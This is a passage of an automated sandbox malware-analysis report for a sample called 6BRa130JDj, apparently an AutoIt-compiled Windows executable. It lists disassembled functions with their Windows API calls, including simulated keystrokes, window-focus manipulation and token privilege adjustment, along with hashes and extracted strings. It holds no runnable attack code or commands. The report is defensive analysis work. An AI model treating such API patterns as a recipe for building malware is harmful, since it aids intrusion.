                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1396898556-0
                                                                                                                    • Opcode ID: bfbc526b6266911b6b9df4c083934302b24aec5f3083be980b1666f05959ca89
                                                                                                                    • Instruction ID: 62dfe5b2481a0b5d65cce389a26b13f6633c48bb58f3a8cf7de9004059482acf
                                                                                                                    • Opcode Fuzzy Hash: bfbc526b6266911b6b9df4c083934302b24aec5f3083be980b1666f05959ca89
                                                                                                                    • Instruction Fuzzy Hash: DD112731A20205ABCF11FF71CC92FED77A9AF44780F508829F541A7183DAB0DA219F51
                                                                                                                    Function 002EFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 5baf2cdce66f128cdace788158d65d97239d8c1384857546bba21fda41ed313c
                                                                                                                    • Instruction ID: f8d839b4431e2f4912c662b3a1cc6b83de7eeec7cb084460ae3fc9e705f622b5
                                                                                                                    • Opcode Fuzzy Hash: 5baf2cdce66f128cdace788158d65d97239d8c1384857546bba21fda41ed313c
                                                                                                                    • Instruction Fuzzy Hash: 7A210674528341DFCB15DF24C484B5ABBE1BF88354F058968E98957722D731E825CF52
                                                                                                                    Function 002D4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __lock_file.LIBCMT ref: 002D48A6
                                                                                                                      • Part of subcall function 002D8B28: __getptd_noexit.LIBCMT ref: 002D8B28
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2597487223-0
                                                                                                                    • Opcode ID: 72dda7e37410967f7d6b540990ab9e67be4e803833a28c631ce9769652632fdd
                                                                                                                    • Instruction ID: 1d5d7d622a488fe01eb916bce255e774a785e193920b7454afacc6f0f324dc48
                                                                                                                    • Opcode Fuzzy Hash: 72dda7e37410967f7d6b540990ab9e67be4e803833a28c631ce9769652632fdd
                                                                                                                    • Instruction Fuzzy Hash: A7F08C31920649ABDB11BFA48C0A7EE36A1AF00365F158416F4249A391CBB88D71EF51
                                                                                                                    Function 002B4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(?,?,003752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 002B4E7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: 14a2bbc901af08f22cc0ffd0dd7a4925c36f7b1a31e2a8b6a88715f24d4525e5
                                                                                                                    • Instruction ID: f5197bacc5d35359a1860f7279f8622f0a339680ab6520d8a82c0f65db8d257c
                                                                                                                    • Opcode Fuzzy Hash: 14a2bbc901af08f22cc0ffd0dd7a4925c36f7b1a31e2a8b6a88715f24d4525e5
                                                                                                                    • Instruction Fuzzy Hash: CCF03071525712CFCB34AF64E4D4852B7E5BF143A5310897EE2D782612C771D860DF40
                                                                                                                    Function 002D0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002D07B0
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongNamePath_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2514874351-0
                                                                                                                    • Opcode ID: b9793669a6c5738e00df80355d6b605f12dfa53ba411f582f3afa62674764bfc
                                                                                                                    • Instruction ID: 5d3bb3973b3c51ddac301808e5c6694e057dd03875531db7e7d780b0e71eee92
                                                                                                                    • Opcode Fuzzy Hash: b9793669a6c5738e00df80355d6b605f12dfa53ba411f582f3afa62674764bfc
                                                                                                                    • Instruction Fuzzy Hash: DEE0CD369441285BC721D6699C06FEA77DDDFC87A0F0441B5FC0CD7245D9749C908AD0
                                                                                                                    Function 00318E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2638373210-0
                                                                                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                    • Instruction ID: d8ba5db75cb11eea91316792a1b764b234495a6109125a908b78675982468122
                                                                                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                    • Instruction Fuzzy Hash: 7DE092B0104B005BD7398B24D840BE377E1AB09304F00091DF2AA83241EBA278818B5D
                                                                                                                    Function 01169218 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 01169223
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                    • Instruction ID: a0f5ce0ce368fac9b413c7a2f23c960165b893922a3442e963c36f5c7effc6f7
                                                                                                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                    • Instruction Fuzzy Hash: 48E08C3090620CEFDB18CEA8C904AA973BCAB04324F004658A906C3280D6328A20D659
                                                                                                                    Function 011691E8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 011691F3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                    • Instruction ID: 053b0cd8a3562d0ec0f316cc8e1c9ab0f1275da171af58f4bf75bb10b2b83c9f
                                                                                                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                    • Instruction Fuzzy Hash: 1AD05E3090520CABCB14CAA899089DA77ACA705324F004758E92583280D63299109754
                                                                                                                    Function 002D525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wfsopen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 197181222-0
                                                                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                    • Instruction ID: 8a50c8b4b281a8c5670881afba95169e2a5b0751e143bafe0981abcd70c24cd1
                                                                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                    • Instruction Fuzzy Hash: CBB0927644020C77CE012A82EC02A493B199B41764F408021FF0C18262E6B3AA789A89
                                                                                                                    Function 0116ABE4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 0116ABF9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                    • Instruction ID: 58b720ccab091c2881db11d8da61d73ef31fe752264c4beb8e97148ee9beb614
                                                                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                    • Instruction Fuzzy Hash: 82E0BF7494010DEFDB00DFA4D6496DD7BB4EF04302F1005A1FD05E7681DB319E648A62
                                                                                                                    Function 0116ABE8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 0116ABF9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction ID: e525beb7634dd8903a6edc0b36ff4ca10b4122a846bee274fae5e37148c9dfcc
                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction Fuzzy Hash: A1E0E67494010DDFDB00DFB4D64969D7BB4EF04302F100161FD01E2281D7319D608A72

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0033CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0033CB37
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0033CB95
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0033CBD6
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0033CC00
                                                                                                                    • SendMessageW.USER32 ref: 0033CC29
                                                                                                                    • _wcsncpy.LIBCMT ref: 0033CC95
                                                                                                                    • GetKeyState.USER32(00000011), ref: 0033CCB6
                                                                                                                    • GetKeyState.USER32(00000009), ref: 0033CCC3
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0033CCD9
                                                                                                                    • GetKeyState.USER32(00000010), ref: 0033CCE3
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0033CD0C
                                                                                                                    • SendMessageW.USER32 ref: 0033CD33
                                                                                                                    • SendMessageW.USER32(?,00001030,?,0033B348), ref: 0033CE37
                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0033CE4D
                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0033CE60
                                                                                                                    • SetCapture.USER32(?), ref: 0033CE69
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0033CECE
                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0033CEDB
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0033CEF5
                                                                                                                    • ReleaseCapture.USER32 ref: 0033CF00
                                                                                                                    • GetCursorPos.USER32(?), ref: 0033CF3A
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0033CF47
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0033CFA3
                                                                                                                    • SendMessageW.USER32 ref: 0033CFD1
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0033D00E
                                                                                                                    • SendMessageW.USER32 ref: 0033D03D
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0033D05E
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0033D06D
                                                                                                                    • GetCursorPos.USER32(?), ref: 0033D08D
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0033D09A
                                                                                                                    • GetParent.USER32(?), ref: 0033D0BA
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0033D123
                                                                                                                    • SendMessageW.USER32 ref: 0033D154
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0033D1B2
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0033D1E2
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0033D20C
                                                                                                                    • SendMessageW.USER32 ref: 0033D22F
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0033D281
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0033D2B5
                                                                                                                      • Part of subcall function 002B25DB: GetWindowLongW.USER32(?,000000EB), ref: 002B25EC
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0033D351
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                    • String ID: @GUI_DRAGID$F$pb7
                                                                                                                    • API String ID: 3977979337-3134611142
                                                                                                                    • Opcode ID: feff5d22ee0b7d45502e15b8a09392972758c77994fc2f52927b5d3510cee835
                                                                                                                    • Instruction ID: f48a8632eb7ab44306b48ddd4ea156c6f27dc8dec0e1059ce4e3b887c8844c5d
                                                                                                                    • Opcode Fuzzy Hash: feff5d22ee0b7d45502e15b8a09392972758c77994fc2f52927b5d3510cee835
                                                                                                                    • Instruction Fuzzy Hash: C542CC34614340AFDB26CF24C885EAABBE9FF49310F141A19F699A72B0C771D850DF92
                                                                                                                    Function 002C6F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_memset
                                                                                                                    • String ID: ]6$3c,$DEFINE$P\6$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_,
                                                                                                                    • API String ID: 1357608183-2105160573
                                                                                                                    • Opcode ID: d0649391f0857d486cf4c9016aeb22ae0a9443d1bf92b9139e6ceee66f4000b4
                                                                                                                    • Instruction ID: cc328107a72b4452adfef1562560db7fa9363ef2afa95b841b289f1410cb42a8
                                                                                                                    • Opcode Fuzzy Hash: d0649391f0857d486cf4c9016aeb22ae0a9443d1bf92b9139e6ceee66f4000b4
                                                                                                                    • Instruction Fuzzy Hash: 9793C271E1121ADFDB25CF98C891BADB7B5FF48310F25816AE945AB2C1E7709E81CB40
                                                                                                                    Function 002B48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 002B48DF
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002ED665
                                                                                                                    • IsIconic.USER32(?), ref: 002ED66E
                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 002ED67B
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 002ED685
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002ED69B
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 002ED6A2
                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 002ED6AE
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 002ED6BF
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 002ED6C7
                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 002ED6CF
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 002ED6D2
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002ED6E7
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 002ED6F2
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002ED6FC
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 002ED701
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002ED70A
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 002ED70F
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002ED719
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 002ED71E
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 002ED721
                                                                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 002ED748
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                    • Opcode ID: f218fdc832fdf2d81a94fc3e10ca160f02d9d98d7ab45062f7747ad8a932322f
                                                                                                                    • Instruction ID: c3fd9d13630059dacd24ac7480a5ad0900a3da775d6c548e7edb5d1ba1c9d407
                                                                                                                    • Opcode Fuzzy Hash: f218fdc832fdf2d81a94fc3e10ca160f02d9d98d7ab45062f7747ad8a932322f
                                                                                                                    • Instruction Fuzzy Hash: 2E315571E903587FEB216F629C8AF7F7E6CEB44B50F504025FA04EA1E1C6B05D11ABA1
                                                                                                                    Function 00308310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003087E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0030882B
                                                                                                                      • Part of subcall function 003087E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00308858
                                                                                                                      • Part of subcall function 003087E1: GetLastError.KERNEL32 ref: 00308865
                                                                                                                    • _memset.LIBCMT ref: 00308353
                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003083A5
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003083B6
                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003083CD
                                                                                                                    • GetProcessWindowStation.USER32 ref: 003083E6
                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 003083F0
                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0030840A
                                                                                                                      • Part of subcall function 003081CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00308309), ref: 003081E0
                                                                                                                      • Part of subcall function 003081CB: CloseHandle.KERNEL32(?,?,00308309), ref: 003081F2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                    • String ID: $default$winsta0
                                                                                                                    • API String ID: 2063423040-1027155976
                                                                                                                    • Opcode ID: fcdecfbeabaaeb84fb17bd485f6e5b0b8c64da7856ff00eb431618ea56122dda
                                                                                                                    • Instruction ID: 8ef14f93578d7cae23f2d5306803615b4254f4447bca15e8c7cadea8eaeb1d1d
